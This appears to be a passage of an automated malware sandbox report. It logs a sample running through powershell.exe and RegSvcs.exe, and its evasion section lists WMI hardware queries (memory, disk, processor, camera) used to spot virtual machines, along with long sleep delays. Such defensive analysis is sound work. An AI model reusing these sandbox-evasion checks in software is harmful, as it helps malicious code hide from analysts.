                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries memory information (via WMI often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9931Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9876Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9852Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9920Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9937Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432Thread sleep count: 9876 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep count: 9852 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
